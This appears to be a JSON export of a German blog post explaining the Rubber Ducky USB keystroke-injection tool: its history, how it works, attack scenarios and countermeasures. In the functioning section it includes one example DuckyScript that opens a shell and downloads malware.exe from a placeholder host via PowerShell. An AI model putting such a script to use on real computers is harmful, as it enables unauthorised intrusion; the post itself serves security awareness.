{"id":800,"date":"2026-03-04T10:09:26","date_gmt":"2026-03-04T09:09:26","guid":{"rendered":"https:\/\/iobseu-xejul.wordpress.com\/?p=800"},"modified":"2026-03-04T10:09:26","modified_gmt":"2026-03-04T09:09:26","slug":"der-rubber-ducky-wenn-der-usb-stick-zur-tastatur-wird","status":"publish","type":"post","link":"https:\/\/technodidact.de\/en\/der-rubber-ducky-wenn-der-usb-stick-zur-tastatur-wird\/","title":{"rendered":"Der Rubber Ducky \u2013 Wenn der USB-Stick zur Tastatur wird"},"content":{"rendered":"<h2 class=\"wp-block-heading\">1. Der Prolog \u2013 Die Szene<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Los Angeles, 2011. Ein gro\u00dfer Konferenzraum, in dem gerade die Mittagspause begonnen hat. Die Teilnehmer str\u00f6men hinaus, um sich Kaffee zu holen oder drau\u00dfen eine Zigarette zu rauchen. Auf den Tischen liegen Laptops, einige im Standby, andere noch laufend, die Bildschirme hell erleuchtet. Ein Mann in dunklem Hemd geht langsam durch die Reihen. Er tr\u00e4gt einen Rucksack, aus dem ein Kabel h\u00e4ngt \u2013 nichts Besonderes, sieht aus wie jeder andere IT-Berater hier. In der Hand h\u00e4lt er einen USB-Stick. Aber er steckt ihn nicht in seinen eigenen Rechner. Im Vorbeigehen, ganz beil\u00e4ufig, als m\u00fcsse er nur kurz etwas nachsehen, beugt er sich zu einem der Laptops. Der Stick verschwindet im Port, eine halbe Sekunde sp\u00e4ter ist er wieder drau\u00dfen. Der Mann geht weiter, ohne sich umzudrehen. Keiner hat es gesehen. Keiner hat etwas bemerkt.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Drei Tage sp\u00e4ter bekommt der Besitzer des Laptops eine seltsame Nachricht von seiner Bank. Jemand hat versucht, 10.000 Euro von seinem Konto abzuheben. Zum Gl\u00fcck war das Limit ausgesch\u00f6pft. Er versteht die Welt nicht mehr. Sein Passwort war sicher. Sein Rechner war nie unbeaufsichtigt \u2013 dachte er. Aber eine halbe Sekunde, das reicht. Das reicht v\u00f6llig.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">2. Der Mensch \u2013 Der Admin, der nicht mehr tippen wollte<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Die Geschichte des Rubber Ducky ist eine aus der IT-Abteilung. Kein Spion, kein Geheimagent \u2013 sondern ein genervter Administrator. Sein Name ist Darren Kitchen, Gr\u00fcnder der Firma Hak5&nbsp;<a href=\"https:\/\/www.rootshellsecurity.net\/keyloggers-part-1\/\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a>. Kitchen war es leid, immer wieder die gleichen Befehle einzutippen, wenn er Drucker konfigurierte, Netzwerkfreigaben einrichtete oder Firewall-Regeln anpasste. Es gibt Arbeiten, die muss man machen. Und es gibt Arbeiten, die machen einen wahnsinnig, weil sie sich jeden Tag wiederholen.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Also bastelte er sich ein kleines Ger\u00e4t, das genau das f\u00fcr ihn \u00fcbernahm. Ein Prototyp, der wie ein USB-Stick aussah, aber beim Einstecken automatisch die immer gleichen Tastenbefehle abfeuerte. Praktisch, dachte er. Zeitersparnis, dachte er. Es dauerte nicht lange, bis ihm klar wurde: Das Ding ist nicht nur praktisch. Es ist eine Waffe. 2011 kam der Rubber Ducky als erstes kommerzielles Keystroke-Injection-Tool auf den Markt&nbsp;<a href=\"https:\/\/www.bgr.com\/2003151\/what-is-usb-port-rubber-ducky-hacking-tool-explained\/\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a>. Kitchen hatte eine B\u00fcchse der Pandora ge\u00f6ffnet \u2013 aber er tat es mit offenen Augen. Er verkaufte das Ger\u00e4t nur an Sicherheitsforscher und Pentester, an die &#8222;Guten&#8220;. Ob es dabei geblieben ist? Wer wei\u00df das schon.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">3. Das Problem \u2013 Die vertraute Tastatur<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Das Problem, das der Rubber Ducky ausnutzt, ist so alt wie USB selbst: Dein Computer vertraut jedem Ger\u00e4t, das sich als Tastatur ausgibt&nbsp;<a href=\"https:\/\/sarwiki.informatik.hu-berlin.de\/index.php?direction=next&amp;oldid=12564&amp;title=USB:_Rubber_Ducky\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a>. Es gibt keinen Virenscan f\u00fcr Tastaturen. Es gibt keine Firewall zwischen dir und deiner Tastatur. Sobald der Computer eine Tastatur erkennt, l\u00e4sst er sie machen. Das Betriebssystem geht davon aus, dass der Nutzer selbst gerade tippt. Und warum sollte es auch anders denken? Eine Tastatur ist ein Eingabeger\u00e4t. Sie soll Befehle \u00fcbermitteln. Das ist ihr Job.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Die Gr\u00f6\u00dfe der Daten, die so \u00fcbertragen werden k\u00f6nnen, ist zwar begrenzt \u2013 ein Rubber Ducky kann keine Terabyte an Daten speichern. Aber das muss er auch nicht. Er muss nur schnell genug tippen, um eine Hintert\u00fcr zu \u00f6ffnen. Danach kann der richtige Schadcode aus dem Internet nachgeladen werden&nbsp;<a href=\"https:\/\/research.hisolutions.com\/author\/berahman\/#chapter-2\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a>. Der Rubber Ducky ist der T\u00fcr\u00f6ffner. Der Einbrecher kommt sp\u00e4ter.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">4. Der Bau \/ Die Funktionsweise \u2013 Die getarnte Tastatur<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u00d6ffnet man einen Rubber Ducky, sieht man: Da ist kein Speicherchip f\u00fcr Dateien. Stattdessen sitzt auf der winzigen Platine ein leistungsstarker Mikrocontroller \u2013 ein AMTEL 32bit, um genau zu sein \u2013 und ein Slot f\u00fcr eine Micro-SD-Karte&nbsp;<a href=\"https:\/\/sarwiki.informatik.hu-berlin.de\/index.php?direction=next&amp;oldid=12564&amp;title=USB:_Rubber_Ducky\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a>. Auf dieser Karte liegt das Skript, das ausgef\u00fchrt werden soll. Geschrieben wird es in einer eigens daf\u00fcr entwickelten Sprache: DuckyScript.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Ein solches Skript sieht etwa so aus&nbsp;<a href=\"https:\/\/sarwiki.informatik.hu-berlin.de\/index.php?direction=next&amp;oldid=12564&amp;title=USB:_Rubber_Ducky\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a>:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">text<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">REM Das hier ist ein Kommentar\nGUI r\nDELAY 500\nSTRING cmd\nENTER\nDELAY 1000\nSTRING powershell -Command \"Invoke-WebRequest -Uri 'http:\/\/boese-server.com\/malware.exe' -OutFile '%TEMP%\\malware.exe'\"\nENTER<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u00dcbersetzt bedeutet das: Dr\u00fcck die Windows-Taste + R (das \u00f6ffnet den Ausf\u00fchren-Dialog), warte eine halbe Sekunde, tipp &#8222;cmd&#8220; ein, dr\u00fcck Enter, warte eine Sekunde, starte PowerShell und lade Schadsoftware aus dem Netz nach. Das alles in weniger als f\u00fcnf Sekunden. Schneller, als jeder Mensch tippen k\u00f6nnte.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Das Geniale \u2013 oder Teuflische \u2013 daran: Du siehst nichts. Wenn der Rubber Ducky als Tastatur erkannt wird, \u00f6ffnet sich kein Fenster, das &#8222;Neue Hardware gefunden&#8220; meldet. Der Computer tut einfach das, was er f\u00fcr Tastatureingaben h\u00e4lt. Und wenn der Angreifer clever ist, l\u00e4sst er das Powershell-Fenster im Hintergrund laufen oder minimiert es gleich&nbsp;<a href=\"https:\/\/sarwiki.informatik.hu-berlin.de\/index.php?direction=next&amp;oldid=12564&amp;title=USB:_Rubber_Ducky\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a>. Du merkst gar nicht, dass gerade jemand in deinem System herumspaziert.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">5. Das Herzst\u00fcck \u2013 Die Geschwindigkeit<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Die eine Idee, die alles ver\u00e4ndert, ist die Geschwindigkeit. Ein Mensch tippt vielleicht f\u00fcnf Anschl\u00e4ge pro Sekunde. Ein Rubber Ducky schafft Hunderte. Er kann in der Zeit, die du brauchst, um &#8222;Halt, was war das?&#8220; zu denken, schon ein komplettes Reverse-Shell-Skript installiert haben.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Es gibt zwei typische Angriffsszenarien&nbsp;<a href=\"https:\/\/sarwiki.informatik.hu-berlin.de\/index.php?direction=next&amp;oldid=12564&amp;title=USB:_Rubber_Ducky\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a>:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Direkter Zugang:<\/strong>&nbsp;Der Angreifer hat kurzzeitig physischen Zugriff auf den Rechner. Er steckt den Ducky an, wartet ein paar Sekunden, zieht ihn wieder ab. Niemand hat etwas gesehen.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Indirekter Zugang:<\/strong>&nbsp;Der Angreifer l\u00e4sst einen USB-Stick irgendwo liegen \u2013 auf dem Parkplatz, in der Kantine, im Konferenzraum. Ein neugieriger Mitarbeiter findet ihn, steckt ihn ein, um zu sehen, wem er geh\u00f6rt. In dem Moment, wo der Rechner den Stick einliest, ist es schon zu sp\u00e4t&nbsp;<a href=\"https:\/\/research.hisolutions.com\/author\/berahman\/#chapter-2\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a>.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Und das alles funktioniert auf Windows, Mac, Linux \u2013 sogar auf gesperrten Rechnern. Ein gesperrter Bildschirm wartet schlie\u00dflich auf die Eingabe des Passworts. Und wer sagt denn, dass das Passwort von einem Menschen kommen muss?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">6. Das Ende \u2013 Was wurde daraus?<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Der Rubber Ducky ist heute das Standardwerkzeug f\u00fcr jeden Pentester. Er kostet um die 50 Euro, ist kleiner als ein Feuerzeug und passt in jede Hosentasche&nbsp;<a href=\"https:\/\/www.bgr.com\/2003151\/what-is-usb-port-rubber-ducky-hacking-tool-explained\/\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a>. In der Serie &#8222;Mr. Robot&#8220; wurde er einem ahnungslosen Opfer in die Tasche gesteckt \u2013 ein kleiner Gru\u00df an die Eingeweihten, die wussten, was das Ding wirklich kann&nbsp;<a href=\"https:\/\/www.rootshellsecurity.net\/keyloggers-part-1\/\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a>.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Die Hersteller haben nachger\u00fcstet. Microsoft und Apple haben Sicherheitsmechanismen eingebaut, die die Installation unbekannter Tastaturen einschr\u00e4nken k\u00f6nnen&nbsp;<a href=\"https:\/\/research.hisolutions.com\/author\/berahman\/#chapter-2\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a>. In Firmen gibt es heute Richtlinien, die USB-Ports komplett sperren oder nur bestimmte, freigegebene Ger\u00e4te erlauben. Aber so richtig bekommen hat man das Problem nie. Denn das Grundprinzip \u2013 dass ein Computer seiner Tastatur vertrauen muss \u2013 l\u00e4sst sich nicht \u00e4ndern. Solange du tippen kannst, kann auch ein Rubber Ducky tippen.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">7. Der Epilog \u2013 Was bleibt?<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Was lernen wir daraus? Es ist die alte Geschichte vom Wolf im Schafspelz. Du siehst einen USB-Stick, denkst &#8222;Dateien&#8220; \u2013 und in Wirklichkeit ist es eine Tastatur. Du siehst ein Kabel, denkst &#8222;Strom&#8220; \u2013 und in Wirklichkeit ist es ein Spion. Die Moral von der Geschicht: Steck nichts in deinen Rechner, dessen Herkunft du nicht kennst. Der USB-Stick auf dem Parkplatz ist kein Geschenk des Himmels. Er ist eine Falle. Und die schnappt zu, lange bevor du &#8222;Halt&#8220; sagen kannst.<\/p>","protected":false},"excerpt":{"rendered":"<p>1. Der Prolog \u2013 Die Szene Los Angeles, 2011. Ein gro\u00dfer Konferenzraum, in dem gerade die Mittagspause begonnen hat. Die Teilnehmer str\u00f6men hinaus, um sich Kaffee zu holen oder drau\u00dfen eine Zigarette zu rauchen. Auf den Tischen liegen Laptops, einige im Standby, andere noch laufend, die Bildschirme hell erleuchtet. Ein Mann in dunklem Hemd geht [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,20,22,35],"tags":[],"class_list":["post-800","post","type-post","status-publish","format-standard","hentry","category-aus-dem-bauch-heraus","category-industrie-4-0-sensorik","category-ki-daten-gesellschaft","category-technisch"],"_links":{"self":[{"href":"https:\/\/technodidact.de\/en\/wp-json\/wp\/v2\/posts\/800","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/technodidact.de\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/technodidact.de\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/technodidact.de\/en\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/technodidact.de\/en\/wp-json\/wp\/v2\/comments?post=800"}],"version-history":[{"count":0,"href":"https:\/\/technodidact.de\/en\/wp-json\/wp\/v2\/posts\/800\/revisions"}],"wp:attachment":[{"href":"https:\/\/technodidact.de\/en\/wp-json\/wp\/v2\/media?parent=800"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/technodidact.de\/en\/wp-json\/wp\/v2\/categories?post=800"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/technodidact.de\/en\/wp-json\/wp\/v2\/tags?post=800"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}